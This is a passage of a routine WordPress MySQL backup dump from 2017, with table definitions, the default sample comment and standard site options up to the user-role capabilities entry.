# WordPress MySQL database backup
#
# Generated: Tuesday 22. August 2017 15:56 UTC
# Hostname: localhost
# Database: `notactiv_wp4`
# --------------------------------------------------------
/*!40101 SET NAMES utf8 */;
# --------------------------------------------------------
# --------------------------------------------------------
# Table: `wp_9pdw7dva53_commentmeta`


#
# Delete any existing table `wp_9pdw7dva53_commentmeta`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_commentmeta`;


#
# Table structure of table `wp_9pdw7dva53_commentmeta`
#

CREATE TABLE `wp_9pdw7dva53_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_commentmeta`
#

#
# End of data contents of table `wp_9pdw7dva53_commentmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_comments`


#
# Delete any existing table `wp_9pdw7dva53_comments`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_comments`;


#
# Table structure of table `wp_9pdw7dva53_comments`
#

CREATE TABLE `wp_9pdw7dva53_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_comments`
#
 
INSERT INTO `wp_9pdw7dva53_comments` VALUES (1, 1, 'A WordPress Commenter', 'wapuu@wordpress.example', 'https://wordpress.org/', '', '2016-09-22 18:31:20', '2016-09-22 18:31:20', 'Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from <a href="https://gravatar.com">Gravatar</a>.', 0, '1', '', '', 0, 0);
#
# End of data contents of table `wp_9pdw7dva53_comments`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_links`


#
# Delete any existing table `wp_9pdw7dva53_links`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_links`;


#
# Table structure of table `wp_9pdw7dva53_links`
#

CREATE TABLE `wp_9pdw7dva53_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_links`
#

#
# End of data contents of table `wp_9pdw7dva53_links`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_options`


#
# Delete any existing table `wp_9pdw7dva53_options`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_options`;


#
# Table structure of table `wp_9pdw7dva53_options`
#

CREATE TABLE `wp_9pdw7dva53_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=164 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_options`
#
 
INSERT INTO `wp_9pdw7dva53_options` VALUES (1, 'siteurl', 'https://c81.bc1.myftpupload.com', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (2, 'home', 'https://c81.bc1.myftpupload.com', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (3, 'blogname', 'A WordPress Site', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (4, 'blogdescription', 'Just another WordPress site', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (5, 'users_can_register', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (6, 'admin_email', 'ddillulio@mschem.com', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (7, 'start_of_week', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (8, 'use_balanceTags', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (9, 'use_smilies', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (10, 'require_name_email', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (11, 'comments_notify', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (12, 'posts_per_rss', '10', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (13, 'rss_use_excerpt', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (14, 'mailserver_url', 'mail.example.com', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (15, 'mailserver_login', 'login@example.com', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (16, 'mailserver_pass', 'password', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (17, 'mailserver_port', '110', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (18, 'default_category', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (19, 'default_comment_status', 'open', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (20, 'default_ping_status', 'open', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (21, 'default_pingback_flag', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (22, 'posts_per_page', '10', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (23, 'date_format', 'F j, Y', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (24, 'time_format', 'g:i a', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (25, 'links_updated_date_format', 'F j, Y g:i a', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (26, 'comment_moderation', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (27, 'moderation_notify', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (28, 'permalink_structure', '/%year%/%monthnum%/%postname%/', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (29, 'rewrite_rules', 'a:73:{s:11:"^wp-json/?$";s:22:"index.php?rest_route=/";s:14:"^wp-json/(.*)?";s:33:"index.php?rest_route=/$matches[1]";s:12:"robots\\.txt$";s:18:"index.php?robots=1";s:48:".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$";s:18:"index.php?feed=old";s:20:".*wp-app\\.php(/.*)?$";s:19:"index.php?error=403";s:18:".*wp-register.php$";s:23:"index.php?register=true";s:32:"feed/(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:27:"(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:8:"embed/?$";s:21:"index.php?&embed=true";s:20:"page/?([0-9]{1,})/?$";s:28:"index.php?&paged=$matches[1]";s:41:"comments/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:36:"comments/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:17:"comments/embed/?$";s:21:"index.php?&embed=true";s:44:"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:39:"search/(.+)/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:20:"search/(.+)/embed/?$";s:34:"index.php?s=$matches[1]&embed=true";s:32:"search/(.+)/page/?([0-9]{1,})/?$";s:41:"index.php?s=$matches[1]&paged=$matches[2]";s:14:"search/(.+)/?$";s:23:"index.php?s=$matches[1]";s:47:"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:42:"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:23:"author/([^/]+)/embed/?$";s:44:"index.php?author_name=$matches[1]&embed=true";s:35:"author/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?author_name=$matches[1]&paged=$matches[2]";s:17:"author/([^/]+)/?$";s:33:"index.php?author_name=$matches[1]";s:69:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:64:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:45:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$";s:74:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true";s:57:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:81:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]";s:39:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$";s:63:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]";s:56:"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:51:"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:32:"([0-9]{4})/([0-9]{1,2})/embed/?$";s:58:"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true";s:44:"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:65:"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]";s:26:"([0-9]{4})/([0-9]{1,2})/?$";s:47:"index.php?year=$matches[1]&monthnum=$matches[2]";s:43:"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:38:"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:19:"([0-9]{4})/embed/?$";s:37:"index.php?year=$matches[1]&embed=true";s:31:"([0-9]{4})/page/?([0-9]{1,})/?$";s:44:"index.php?year=$matches[1]&paged=$matches[2]";s:13:"([0-9]{4})/?$";s:26:"index.php?year=$matches[1]";s:58:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:68:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:88:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:83:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:83:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:64:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:53:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$";s:91:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true";s:57:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$";s:85:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1";s:77:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:97:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]";s:72:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:97:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]";s:65:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$";s:98:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]";s:72:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$";s:98:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]";s:61:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$";s:97:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]";s:47:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:57:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:77:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:72:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:72:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:53:"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:64:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$";s:81:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]";s:51:"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$";s:65:"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]";s:38:"([0-9]{4})/comment-page-([0-9]{1,})/?$";s:44:"index.php?year=$matches[1]&cpage=$matches[2]";s:27:".?.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:".?.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:".?.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"(.?.+?)/embed/?$";s:41:"index.php?pagename=$matches[1]&embed=true";s:20:"(.?.+?)/trackback/?$";s:35:"index.php?pagename=$matches[1]&tb=1";s:40:"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:35:"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:28:"(.?.+?)/page/?([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&paged=$matches[2]";s:35:"(.?.+?)/comment-page-([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&cpage=$matches[2]";s:24:"(.?.+?)(?:/([0-9]+))?/?$";s:47:"index.php?pagename=$matches[1]&page=$matches[2]";}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (30, 'hack_file', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (31, 'blog_charset', 'UTF-8', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (32, 'moderation_keys', '', 'no'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (33, 'active_plugins', 'a:2:{i:0;s:34:"wp-clone-by-wp-academy/wpclone.php";i:1;s:45:"wp101-video-tutorial/wp101-video-tutorial.php";}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (34, 'category_base', '', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (35, 'ping_sites', 'https://rpc.pingomatic.com/', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (36, 'comment_max_links', '2', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (37, 'gmt_offset', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (38, 'default_email_category', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (39, 'recently_edited', '', 'no'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (40, 'template', 'twentysixteen', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (41, 'stylesheet', 'twentysixteen', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (42, 'comment_whitelist', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (43, 'blacklist_keys', '', 'no'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (44, 'comment_registration', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (45, 'html_type', 'text/html', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (46, 'use_trackback', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (47, 'default_role', 'subscriber', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (48, 'db_version', '37965', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (49, 'uploads_use_yearmonth_folders', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (50, 'upload_path', 'wp-content/uploads', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (51, 'blog_public', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (52, 'default_link_category', '2', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (53, 'show_on_front', 'posts', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (54, 'tag_base', '', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (55, 'show_avatars', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (56, 'avatar_rating', 'G', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (57, 'upload_url_path', '', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (58, 'thumbnail_size_w', '150', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (59, 'thumbnail_size_h', '150', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (60, 'thumbnail_crop', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (61, 'medium_size_w', '300', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (62, 'medium_size_h', '300', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (63, 'avatar_default', 'mystery', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (64, 'large_size_w', '1024', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (65, 'large_size_h', '1024', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (66, 'image_default_link_type', 'none', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (67, 'image_default_size', '', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (68, 'image_default_align', '', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (69, 'close_comments_for_old_posts', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (70, 'close_comments_days_old', '14', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (71, 'thread_comments', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (72, 'thread_comments_depth', '5', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (73, 'page_comments', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (74, 'comments_per_page', '50', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (75, 'default_comments_page', 'newest', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (76, 'comment_order', 'asc', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (77, 'sticky_posts', 'a:0:{}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (78, 'widget_categories', 'a:2:{i:2;a:4:{s:5:"title";s:0:"";s:5:"count";i:0;s:12:"hierarchical";i:0;s:8:"dropdown";i:0;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (79, 'widget_text', 'a:0:{}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (80, 'widget_rss', 'a:0:{}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (81, 'uninstall_plugins', 'a:0:{}', 'no'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (82, 'timezone_string', '', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (83, 'page_for_posts', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (84, 'page_on_front', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (85, 'default_post_format', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (86, 'link_manager_enabled', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (87, 'finished_splitting_shared_terms', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (88, 'site_icon', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (89, 'medium_large_size_w', '768', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (90, 'medium_large_size_h', '0', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (91, 'initial_db_version', '37965', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (92, 'wp_9pdw7dva53_user_roles', 'a:5:{s:13:"administrator";a:2:{s:4:"name";s:13:"Administrator";s:12:"capabilities";a:61:{s:13:"switch_themes";b:1;s:11:"edit_themes";b:1;s:16:"activate_plugins";b:1;s:12:"edit_plugins";b:1;s:10:"edit_users";b:1;s:10:"edit_files";b:1;s:14:"manage_options";b:1;s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:6:"import";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:8:"level_10";b:1;s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:12:"delete_users";b:1;s:12:"create_users";b:1;s:17:"unfiltered_upload";b:1;s:14:"edit_dashboard";b:1;s:14:"update_plugins";b:1;s:14:"delete_plugins";b:1;s:15:"install_plugins";b:1;s:13:"update_themes";b:1;s:14:"install_themes";b:1;s:11:"update_core";b:1;s:10:"list_users";b:1;s:12:"remove_users";b:1;s:13:"promote_users";b:1;s:18:"edit_theme_options";b:1;s:13:"delete_themes";b:1;s:6:"export";b:1;}}s:6:"editor";a:2:{s:4:"name";s:6:"Editor";s:12:"capabilities";a:34:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;}}s:6:"author";a:2:{s:4:"name";s:6:"Author";s:12:"capabilities";a:10:{s:12:"upload_files";b:1;s:10:"edit_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:4:"read";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;s:22:"delete_published_posts";b:1;}}s:11:"contributor";a:2:{s:4:"name";s:11:"Contributor";s:12:"capabilities";a:5:{s:10:"edit_posts";b:1;s:4:"read";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;}}s:10:"subscriber";a:2:{s:4:"name";s:10:"Subscriber";s:12:"capabilities";a:2:{s:4:"read";b:1;s:7:"level_0";b:1;}}}', 'yes'); 
